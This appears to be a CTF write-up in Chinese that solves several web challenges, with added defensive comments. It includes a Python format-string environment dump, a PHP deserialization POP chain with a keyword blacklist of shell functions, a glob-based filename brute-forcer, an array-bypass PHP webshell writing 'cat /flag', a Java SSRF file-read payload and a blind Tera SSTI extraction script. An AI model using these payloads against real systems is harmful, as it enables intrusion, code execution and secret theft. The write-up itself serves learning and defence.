Web-Escape

这题直接改的别人的题,链接:https://github.com/noflowpls101/CTFS_2023/blob/a78e5f759304a01415cb6b1f5113c2384b353e7f/ImaginaryCTF_2023/Web_Helpful/solve.py
,没给salt,16位爆破太长了,直接注入找环境变量
主要是信息收集吧 https://imaginaryctf.org/ArchivedChallenges/39
image.png

http://172.10.0.5:10000/?username={passhash.__str__.__globals__[app].wsgi_app.__globals__[os].environ}&password=anything
注入
Pasted image 20231104173536.png

Web-web1

 <?php
// Sends this file's own source to every client, so the class layout below (and
// therefore every gadget used later) is public by design.
show_source(__FILE__);
// Silences warnings/notices; errors raised inside the gadget chain are not shown.
error_reporting(0);
class Hacker{
    private $exp;
    private $cmd;

    // Sink of the chain: converting a Hacker to a string runs `cat /flag`.
    // The dangerous strings live in this class body, not in any payload, so a
    // keyword filter on the serialized input never sees them.
    public function __toString()
    {
        call_user_func('system', "cat /flag");
    }
}

class A
{
    public $hacker;
    // Reads ->name on whatever $hacker holds; if that object has no such
    // property but defines __get() (see C), the read is routed there.
    public function __toString()
    {
        echo $this->hacker->name;
        return "";
    }
}
class C
{
    public $finish;
    // Fires on access to an undefined property; calls a method named hacker()
    // on $finish (a class without it but with __call(), e.g. K, intercepts it).
    public function __get($value)
    {
        $this->finish->hacker();
        echo 'nonono';
    }
}
class E
{
    public $hacker;

    // Fires when an E instance is used as a callable (e.g. via call_user_func);
    // echoes the argument, then calls welcome() on $hacker.
    public function __invoke($parms1)
    {
        echo $parms1;
        $this->hacker->welcome();
    }
}

class H
{
    public $username="admin";
    // Entry point of the chain: runs automatically when the unserialized
    // object is destroyed, no further interaction needed.
    public function __destruct()
    {
        $this->welcome();

    }
    // The string concatenation converts $username to a string, so an object
    // stored there has its __toString() invoked (Hacker's, in the writeup's payload).
    public function welcome()
    {
        echo "welcome~ ".$this->username;
    }
}

class K
{
    public $func;
    // Catches calls to undefined methods and invokes the attacker-settable
    // $func with the single argument 'welcome'.
    public function __call($method,$args)
    {
        call_user_func($this->func,'welcome');
    }
}

class R
{
    private $method;
    private $args;

    // Generic "call anything with anything" gadget. Note that $key, $finish1
    // and $finish are not declared on this class; they only exist if the
    // serialized payload supplies them as extra properties.
    public function welcome()
    {
        if ($this->key === true && $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func_array($this->method,$this->args);
            }
        }
    }
}

// Keyword blacklist applied to the raw serialized string (case-insensitive);
// matches are deleted rather than rejected. It only inspects payload text, so a
// chain whose dangerous calls sit in class code (Hacker::__toString above)
// passes untouched — a blacklist is not a substitute for refusing to
// unserialize user input.
function nonono($a){
    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|system|eval|flag/i";
    return preg_replace($filter,'',$a);
}

// Root cause: unserialize() on a POST body instantiates any class in scope and
// triggers its magic methods. Mitigation is to use a data-only format (JSON)
// or at minimum unserialize(..., ['allowed_classes' => false]).
$a = $_POST["pop"];
if (isset($a)){
    unserialize(nonono($a));
}
?>

牛魔题,直接秒了

<?php
// Print this generator's own source (kept from the original) and silence notices.
show_source(__FILE__);
error_reporting(0);

// Stand-in for the target's Hacker class. Property names and their `private`
// visibility must match the target exactly: PHP encodes visibility into the
// serialized key ("\0Hacker\0exp"). No method body is needed here — the target's
// own class supplies __toString() once the string is unserialized there.
class Hacker{
    private $exp;
    private $cmd;
}

// Entry gadget: on the target, H::__destruct() calls welcome(), whose string
// concatenation converts $username and so invokes Hacker::__toString().
class H
{
    public $username;
    public function __construct(){
        $this->username = new Hacker;
    }
}

$payload = new H;
print serialize($payload);

?>

Pasted image 20231104182205.png

Web-web2

源代码提示:

<!-- backdoor_[a-f0-9]{16}.php -->

先爆文件名
import requests
import string

url = "http://172.10.0.5/"

# Candidate characters for the unknown part of the name: a-z, the digits and
# "." (the dot lets the loop continue past the hex id into the ".php" suffix).
charset = string.ascii_letters[:26] + "0123456789."

# Known prefix of the file name; extended by one confirmed character per round.
path = "backdoor_"

# The endpoint answers "yesyesyes" when the glob:// pattern given in `filename`
# matches an existing file, so the reply works as a file-existence oracle.
# Presumably the server hands the raw parameter to a PHP file function; the
# fix is to reject client-chosen stream wrappers and restrict paths server-side.
for position in range(0, 50):
    for candidate in charset:
        probe = {
            "filename": f"glob:///var/www/html/{path + candidate}*",
        }
        response = requests.post(url, probe)
        if "yesyesyes" in response.text:
            path += candidate
            print(position, path)
            break

/backdoor_00fbc51dcdf9eef767597fd26119a894.php

 <?php
// The source (including the md5 salt below) is shown to every client.
highlight_file(__FILE__);
error_reporting(0);

if(isset($_GET['username'])){
    // Per-user sandbox directory; since the salt is public, the path is
    // predictable for anyone who knows the username.
    $sandbox = '/var/www/html/sandbox/'.md5("5050f6511ffb64e1914be4ca8b9d585c".$_GET['username']).'/';
    mkdir($sandbox);
    chdir($sandbox);

    if(isset($_GET['title'])&&isset($_GET['data'])){
        // No type check: $title/$data may be arrays as well as strings. The
        // writeup shows that array values get past the strlen() gate on the
        // PHP version this ran on, so the "5 bytes" limit is not enforced.
        // A defensive version checks is_string() first.
        $data = $_GET['data'];
        $title= $_GET['title'];
        if (strlen($data)>5||strlen($title)>3){
            die("no!no!no!");
        }
        // User-controlled file name and content written to disk, then
        // executed with `php`. $title is concatenated into the path and into
        // two shell commands with no escapeshellarg() and no basename check.
        file_put_contents($sandbox.$title,$data);

        if (strlen(file_get_contents($title)) <= 10) {
            system('php '.$sandbox.$title);
        }
        else{
            system('rm '.$sandbox.$title);
            die("no!no!no!");
        }

    }
    else if (isset($_GET['reset'])) {
        // Recursive delete of the sandbox path built above.
        system('/bin/rm -rf ' . $sandbox);
    }
}
?>

一开始以为是5字符webshell构造,但是这里system执行的命令固定是php,所以不行
直接数组绕过长度限制
?username=jmx0hxq&title[]=1.php&data[]=<?= `cat /flag`?>

Pasted image 20231104182854.png

Web-HTTP

先dirsearch扫到/swagger-resources路由

里面有/v3/api-docs路由

提示/proxy/url可以传url,一看就是ssrf页面
还有ui页面: http://172.10.0.3:8080/swagger-ui/index.html

Pasted image 20231104180437.png

Java SSRF 绕过伪协议参考:
https://www.freebuf.com/articles/web/364113.html

  • url:file绕过协议限制
  • %23绕过扩展限制
    /proxy/url?url=url:file:/flag%23html
    Pasted image 20231104180554.png

Tera


当时这个SSTI给我整麻了,我已经猜到它是盲注了,但是标题是Tera,好像是Rust的模板引擎,于是去学习一下它的语法:
https://www.codenong.com/cs107111967/

可以看到里面有个matching内置函数,可以匹配正则表达式模式

import string
import requests

url = "http://172.10.0.3:8081/"


def test(flag):
    """Return True when the server's `flag` environment variable matches regex `flag`.

    The posted Tera template obtains the variable name by reversing "galf" inside
    the template, reads it with get_env(), and renders the marker "1234" only when
    the value satisfies matching(...). One bit leaks per request, which is what
    makes the blind extraction below possible. From the defender's side: a
    user-supplied template is code running in the engine, so functions like
    get_env() must not be reachable from untrusted templates.
    """
    template = (
        '{% set t="galf"|reverse %}'
        '{% set f=get_env(name=t,default="123") %}'
        '{% if f is matching("flag.*") %}1234{% endif %}'
    ).replace('flag', flag)
    body = requests.post(url, template).text
    return "1234" in body

# Search alphabet: hex digits and "-" for the flag body; "+" is a sentinel
# meaning "nothing matched, treat the current prefix as the whole flag".
alphabet = string.hexdigits + "-+"
# Regex prefix confirmed so far. "^fla.." anchors at the start and uses two
# wildcards instead of spelling out the word, presumably because the literal
# word is filtered by the target (see the note below the script).
flag = "^fla.."
while True:
    for ch in alphabet:
        if ch == "+":
            print(flag + '}')
            exit()
        if test(flag + ch):
            flag += ch
            print(flag)
            break

这里直接用reverse过滤器来绕过flag敏感字符串,通过环境变量回显来盲注flag

  • ^fla..表示以fla开头,后面任意接两个字符